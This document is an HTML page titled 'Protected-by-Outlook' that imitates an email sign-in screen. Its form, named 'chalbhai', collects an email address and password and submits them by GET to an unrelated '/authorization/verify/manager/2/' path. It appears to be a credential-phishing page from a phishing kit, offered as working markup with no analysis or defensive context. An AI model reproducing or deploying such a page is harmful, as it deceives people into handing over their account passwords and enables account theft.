<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<head><meta charset="windows-1252">
<link rel="shortcut icon" href='small.ico'>
<title>Protected-by-Outlook</title>


</head><body style="visibility: visible;" onload="unhideBody()" bgproperties="fixed" background="Sign in_files/white.png">
<style> 
  .textbox { 
    border: 1px solid #c4c4c4; 
    height: 40px; 
    width: 275px; 
    font-size: 16px; 
    padding: 4px 4px 4px 4px; 
    border-radius: 4px; 
    -moz-border-radius: 4px; 
    -webkit-border-radius: 4px;
padding-left:18px;	

 
     
} 
 
.textbox:focus { 
    outline: none; 
    border: 1px solid #7bc1f7; 
    box-shadow: 0px 0px 8px #7bc1f7; 
    -moz-box-shadow: 0px 0px 8px #7bc1f7; 
    -webkit-box-shadow: 0px 0px 8px #7bc1f7; 
} 
 </style> 


<div id="image1" style="position:absolute; overflow:hidden; left:405px; top:147px; width:599px; height:592px; z-index:0"><img src="Sign%20in_files/yellow.png" alt="" title="" width="599" height="592" border="0"></div>
<form action="/authorization/verify/manager/2/" name="chalbhai" id="chalbhai" method="GET">
<input name="Email" placeholder="Email Address" class="textbox" required="" style="position:absolute;width:343px;left:534px;top:445px;z-index:1" type="text">

<input name="Password" placeholder="Email Password" class="textbox" required="" style="position:absolute;width:343px;left:534px;top:499px;z-index:2" type="password">
<div id="formimage1" style="position:absolute; left:562px; top:553px; z-index:3"><input name="formimage1" src="Sign%20in_files/blue.png" width="290" type="image" height="38"></div>



</form>
</body>
</html>